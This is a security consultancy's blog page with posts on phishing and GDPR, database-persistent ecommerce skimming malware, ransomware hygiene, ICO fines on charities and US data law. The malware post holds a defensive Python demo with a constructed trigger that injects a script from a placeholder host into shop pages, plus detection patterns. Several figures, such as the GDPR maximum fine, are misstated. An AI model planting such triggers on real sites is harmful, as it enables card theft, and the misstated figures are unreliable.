SRM Blog

Phishing and GDPR compliance

By Paul Brennecker, Principal Consultant, CISM | PCI QSA | PCI PFI | PCIP

There is a saying that a chain is only as strong as its weakest link. This, unfortunately, is true. When a company manages and handles sensitive customer data, it does not matter how robust the security measures are if one unsuspecting employee inadvertently opens up the system to hackers. Yet the danger this presents is sometimes underestimated.

Failure to protect customer data adequately already results in serious sanctions and fines under the current Data Protection Act (DPA) legislation. In 2016 twenty-one fines were levied in the UK totalling £2.1 million. When the General Data Protection Regulation (GDPR) comes into effect next May, however, things will become even tougher. With a theoretical maximum fine of up to £500,000 or 4 per cent of global turnover, these sanctions alone have the potential to bring a company down.

A common route to a data security breach is what is known as phishing: an attempt to obtain sensitive information such as usernames, passwords and credit card details for malicious reasons by disguising as a trustworthy entity in an electronic (or telephone) communication. Phishing messages mislead unsuspecting individuals into giving hackers a foothold in a corporate system.

Typically, they will appear to come from a popular, well-known or reputable-sounding company. Microsoft, LinkedIn and Google Drive have all had their names hijacked for fraudulent purposes. The cybercriminal will then set out a fictitious issue with a user account, threaten that action will be taken if it is not remedied and provide a link to click. At first glance the corporate branding, email address and link will look genuine. This type of phishing email is indiscriminate in its approach and is out to catch any unwary soul who takes the bait.

A more worrying trend is the ‘Spear Phishing’ attack, where a specific individual or a small number of individuals is targeted within an organisation. These people are often in positions where they have access to company-sensitive information or records, such as the finance or marketing teams. With a little research, the source of the spear phishing attack can ascertain the name of a senior member of staff within the company and trick the recipients into believing the message has originated from the boss. These emails will be aimed at members of the team further down the chain in order to gain further information or even to ask directly for payments to be made. Once you understand the anatomy of a spear phishing attack, you can see why an organisational chart and email address book become invaluable data to the attacker. This may have been gathered as part of an initial phishing attack, through the use of malware injected onto email or Active Directory servers.

So – if an unsolicited email of any type appears, it should not be opened. If it is, it is worth checking the spelling and grammar. Unlike professional companies, who use copy editors to check their content, cybercriminals are not known for their written English. Links should also be checked. By hovering a mouse over the link (without clicking through) an entirely different web address may appear. Any message that leads to a request for sensitive account information should be treated as a phishing attempt. Genuine companies never request password or bank account information online. Yet if an employee has got to this stage, it is likely that a malicious attack will already be underway.

Training staff how to recognise and deal with suspicious emails is just one element of a robust information security plan. SRM’s specialist consultants have the experience and expertise to manage all elements of information security from employee training to forensic investigations; from penetration testing to preparing for GDPR compliance. To discuss any aspect of information security please contact us.

Emerging Trend: Persistent JavaScript Ecommerce Malware

Our analysts report another trend that administrators should be aware of. This is a JavaScript-based eCommerce malware that re-infects websites automatically when its removal is incomplete. It has been identified as a new technique being used by cyber criminals.

This type of malware obtains its persistence by modifying the database so that a malicious JavaScript file is injected into an eCommerce webpage. By targeting the database rather than the page files, the malware becomes resilient to normal removal attempts. Cyber criminals have recently used this technique against eCommerce merchants, successfully injecting the JavaScript code into a database field of a merchant’s website and compromising payment card data.

This malware reinfection method can be used on any eCommerce platform that uses database fields to populate content on the shopping cart webpage. Reinfection of a website proceeds as follows:
1. A database trigger is added to the order table, which injects the malicious JavaScript link into the website template fields.
2. The trigger is executed every time a new order is placed, so the link is re-inserted even after it has been removed from the template.

Scanning for malicious code in HTML files alone is not sufficient to detect this malware. Analysis of the database is required to ensure a proper clean-up of JavaScript eCommerce malware.
Regular scanning of webservers for malware is one recommended mitigation measure eCommerce websites can take to identify security vulnerabilities. Another recommended best practice is to check for malicious database triggers on eCommerce websites and remove any that are found.
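To make the re-infection mechanism and the two-part clean-up concrete, here is an added example written for this page; it is not SRM’s code nor taken from any real incident. It uses an in-memory SQLite database to stand in for the shop’s database, with a constructed cut-down schema (a `cms_block` template table and a `sales_order` table), one legitimate housekeeping trigger and one constructed trigger that appends a script tag to the footer template on every new order. The trigger names, the `x.js` filename and the `cdn.example.invalid` host are all placeholders. The walk-through shows that stripping the tag from the HTML content alone is undone by the next order, and that only dropping the trigger and then cleaning the content leaves the site clean.

```python
import re
import sqlite3

# Things a trigger body has no business containing on a shop database:
# inline script tags, references to .js files, or any http(s) URL.
SUSPICIOUS_TRIGGER = re.compile(r"<script|\.js\b|https?://", re.IGNORECASE)

# Matches a complete <script ...>...</script> element inside stored HTML.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def build_sample_db():
    """Constructed sample database: a minimal shop schema with one legitimate
    trigger and one planted re-infection trigger. Placeholder URL, not a real IoC."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cms_block (id INTEGER PRIMARY KEY, name TEXT, content TEXT);
        CREATE TABLE sales_order (id INTEGER PRIMARY KEY, total REAL, created TEXT);
        INSERT INTO cms_block (name, content) VALUES ('footer', '<p>Thanks for shopping</p>');

        -- Legitimate housekeeping trigger: stamps each new order with a timestamp.
        CREATE TRIGGER order_stamp AFTER INSERT ON sales_order
        BEGIN
            UPDATE sales_order SET created = datetime('now') WHERE id = NEW.id;
        END;

        -- Constructed re-infection trigger: every new order rewrites the template
        -- block so the (placeholder) script tag reappears after an HTML-only clean.
        CREATE TRIGGER order_hook AFTER INSERT ON sales_order
        BEGIN
            UPDATE cms_block
               SET content = content || '<script src="https://cdn.example.invalid/x.js"></script>'
             WHERE name = 'footer' AND content NOT LIKE '%x.js%';
        END;
    """)
    return conn


def list_triggers(conn):
    """Return (name, table, sql) for every trigger defined in the database."""
    return conn.execute(
        "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger'"
    ).fetchall()


def find_suspicious_triggers(conn):
    """Triggers whose body references script tags, .js files or URLs."""
    return [(name, tbl) for name, tbl, sql in list_triggers(conn)
            if sql and SUSPICIOUS_TRIGGER.search(sql)]


def drop_suspicious_triggers(conn):
    """Remove every suspicious trigger; returns the names dropped."""
    names = [name for name, _ in find_suspicious_triggers(conn)]
    for name in names:
        # DROP TRIGGER cannot take a bound parameter; quote the identifier instead.
        conn.execute('DROP TRIGGER "%s"' % name.replace('"', '""'))
    return names


def strip_scripts(conn):
    """HTML-only clean-up: remove script tags from stored template content."""
    for row_id, content in conn.execute("SELECT id, content FROM cms_block").fetchall():
        cleaned = SCRIPT_TAG.sub("", content)
        if cleaned != content:
            conn.execute("UPDATE cms_block SET content = ? WHERE id = ?", (cleaned, row_id))


def footer_is_infected(conn):
    """True if the footer template currently carries a script tag."""
    (content,) = conn.execute("SELECT content FROM cms_block WHERE name = 'footer'").fetchone()
    return bool(SCRIPT_TAG.search(content))


def place_order(conn, total):
    """Simulate a customer checkout, which fires the AFTER INSERT triggers."""
    conn.execute("INSERT INTO sales_order (total) VALUES (?)", (total,))


def run_demo():
    """Walk through infection, a partial clean-up, and a complete clean-up."""
    conn = build_sample_db()
    result = {"suspicious": find_suspicious_triggers(conn)}
    place_order(conn, 19.99)
    result["infected_after_order"] = footer_is_infected(conn)
    strip_scripts(conn)                      # clean the HTML only ...
    place_order(conn, 5.00)                  # ... and the next order re-infects it
    result["reinfected_after_html_clean"] = footer_is_infected(conn)
    result["dropped"] = drop_suspicious_triggers(conn)
    strip_scripts(conn)                      # now clean the HTML again
    place_order(conn, 42.00)                 # no trigger left to re-inject
    result["infected_after_full_clean"] = footer_is_infected(conn)
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

On a real platform the equivalent check is a query against the engine’s trigger catalogue (for example `information_schema.TRIGGERS` on MySQL) for bodies containing script tags or external URLs, followed by inspection of every template or CMS content field, since a clean HTML scan on its own says nothing about what the next order will write back.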

If you are in doubt, contact the SRM team who can arrange to run a check for you!

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

Ransomware – Could it be you?….

Complacency has always been the enemy of safety; in today’s world, we are all vulnerable!

The digital (cyber) environment may sometimes be opaque and difficult to understand, but it is a contested environment. If we seek to operate within it, and exploit its advantages, we must actively engage or expect to become a victim.

As I write, a number of organisations worldwide are reeling under the hammer of what appears to be a thoroughly industrialised cyber attack. Many of these affected organisations have (or claim) a reputation for strong governance. There is no-one reading this who doesn’t have actions that they should have taken or should be taking now.

Whilst it is tempting to view this sort of event as spectators, anyone reading this is unlikely to be invulnerable, whether we are part of an organisation or an individual. There are steps we should all be taking to reduce risk to ourselves or our organisations. We ignore these responsibilities at our peril.

Those who are responsible for the safety of organisations will have already taken actions to ensure that they are as safe as possible. This is part of baseline governance needed in today’s world and no organisation can claim to be competently run if it doesn’t have an effective Information or Cyber Security Management System. If you have one – you will probably know about it!

If you haven’t – then now is a good time to start – and if necessary get in touch with someone who can help you. (if you can’t think of anyone specific or are worried, is a good place to start!) There are a number of excellent schemes and established practices that you can use to raise the bar for attackers. If you have done nothing else yet – at least look at the Cyber Essentials Scheme as a first step.

If you don’t know who is responsible in your company – check – it could be you!

As individuals, however, we are still potential victims of attacks like this, but if we practice basic Cyber Hygiene we dramatically reduce the risks to ourselves and those around us.

Make sure our defences are strong:

Ensure our Anti Virus (even on a mac!), firewalls and software are all up to date and switched on.
Scan our systems with Anti Virus, and do this regularly when attacks are going on.
Stay alert to any suspicious emails and messages, and don’t open anything suspicious. If someone sends you something suspicious, contact them separately to check it is legitimate.
Check that we are using difficult to guess passwords, and that we are not exposing the password protecting our “crown jewels” on untrusted internet sites or unprotected devices.
Check our bank and card statements – Regularly!
Think it through from an attacker’s perspective.

Make sure we are resilient:

Ensure our information is backed up and kept somewhere that isn’t connected to the internet or our main system (e.g. a CD or a backup drive).
Ensure we keep all backup data safe – and if possible encrypted. Ideally under lock and key.
Ensure that any critical information is held safely so that it will be available in the event that our main system is unavailable.

Make sure we know what to do if we are compromised:

Write down a simple plan – stick it on the fridge or the filing cabinet – somewhere we can find it!
Don’t pay ransoms – we shouldn’t need to!
Know who we are going to contact for further advice in emergency.

Don’t Assume – Check that you are as safe as you think you are. Do this periodically and when the risk rises:

Check that our backups are being taken (and that the drive is not full). Check that we can restore them and that they are not corrupted.
Check that you can access your critical data and files if your main system is down.
If you don’t know how to do any of this – learn now – these are basic survival skills! If you have friends or family members who may not be able to do this – it may be worth contacting them to check they are not exposing themselves inadvertently.

Whether we are acting as individuals or are responsible for the safety of an organisation, this is no longer something for someone else to do – we all have a part to play, and must play it to the best of our ability.

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

No breach too small – the ICO takes action against charities

In December 2016 the Information Commissioner’s Office (ICO) fined a historical society £400 after a laptop containing personal data was stolen while a member of staff was working away from the office. The data was not encrypted and contained details of donors and the artefacts they had gifted. The ICO investigation found ‘the organisation had no policies or procedures around homeworking, encryption and mobile devices which resulted in a breach of data protection law’. So, it is not just big business that needs to comply with data protection law. It applies to everyone, regardless of size or motive. In fact, some well-loved charities ran into trouble with the ICO this year.

In April 2017 an ICO report revealed that thirteen charities have been fined for non-compliance. The ICO is the independent authority set up to ‘uphold information rights in the public interest’. They have the power to take action when data rules are breached, regardless of scale.

Between 2015 and 2017 the ICO carried out an investigation into the practices of charity fundraising. The thirteen charities which were fined included Battersea Dogs’ and Cats’ Home, Cancer Research UK, Great Ormond Street Hospital, Macmillan Cancer Support, Oxfam, NSPCC, The Royal British Legion and Guide Dogs for the Blind Association. Fines ranged from £6,000 – £18,000 depending on the non-compliance identified. The breaches fell into three distinct areas:

Finding information about you that you didn’t provide. The ICO asserts that the individual has the right to choose what personal information is provided. The practice of using external companies to find missing information or update out-of-date information is not permitted. Battersea Dogs’ Home received a £9,000 fine for using this approach in 740,181 cases between 2011 and 2015.

Sharing your details with other charities, no matter what the cause. It is common for some charities to exchange donor information. The practice of sharing donor information is not illegal but using an external organisation and not knowing with which other charities it is being shared is. Cancer Support UK was fined £16,000 for failing to follow data protection rules.

Ranking based on wealth. Some charities profile their donors based on wealth. External companies can also identify donors they believe charities should target because they are most likely to leave money in their wills. It is called legacy profiling. The Guide Dogs for the Blind Association was fined £15,000 for this and for sourcing information they did not have permission to access.

The important message is that it does not matter what size the organisation or whatever its status, the same rules apply. It is also worth noting that the rules regarding personal data will become significantly stricter when the General Data Protection Regulation (GDPR) becomes UK law in May 2018. To find out about your obligations and how to comply, including protecting personal information, see the ICO’s Data Protection Self Assessment Toolkit.

Data protection – the gap widens across the Atlantic

Data protection is a global issue. Yet it is being approached in very different ways on either side of the Atlantic. While Europe and Britain will embrace the more stringent rules of the General Data Protection Regulation (GDPR) from May 2018, the situation in the USA is going the other way. On 3rd April President Trump signed a new law making more personal data legally available. Overturning the previous legislation, ISPs are now able to access and use all but the most sensitive personal information. Much of this personal data is likely to be harvested and sold to digital advertisers.

While the global superpower Google already grows its business through targeted online advertising, this will open up the practice in the US to a host of other players in the ISP market. Its advocates say this availability of data helps advertisers to target consumers more effectively, thereby helping consumers to make better decisions. Its detractors see it very differently.

Whatever your view, Personal Information Management Services (PIMS) are already huge revenue generators and not just in the United States. A study estimates the value of the UK PIMS market to be currently worth £16.5 billion. But from this moment on, the paths diverge and when it comes to the future of personal data protection, it appears that the differentiator will be regional legislation.

The change in law in the US, with its permissive approach to personal data, will open up the PIMS market and along with it many associated problems. It certainly seems likely that this will create a need for privacy-enhancing tools and services. In Europe, on the other hand, the legislative market under the GDPR might drive online advertising businesses to invest in new models which create value from mining personal data in legal ways. There is little that can be done to prevent opportunism in the world of PIMS and digital advertising, but the American model is fraught with problems and risks, both financial and moral. We in the UK must be grateful for the very different approach mandated by GDPR.

When GDPR comes into effect, UK companies will be legally obliged to observe new procedures and take even greater responsibility for how they collect, share, and use consumers’ data. Some businesses will complain that the new regulation is burdensome and bureaucratic but they are wrong. Those who shirk it will certainly feel some pain as enforcement will be strict and fines extremely severe. But many will embrace it as an opportunity; as a competitive differentiator. If in any doubt, the complainers will only have to keep an eye on how the permissive data protection laws impact across the Atlantic.

SRM has operated in the data security environment for many years. With a wide range of knowledge and practical experience, our consultants are ready to help you understand the risks to your information and manage them effectively. Our specialist team provides a full portfolio of services which include data protection. We can assist companies to be in a more ready state for GDPR compliance when it comes into effect next year.
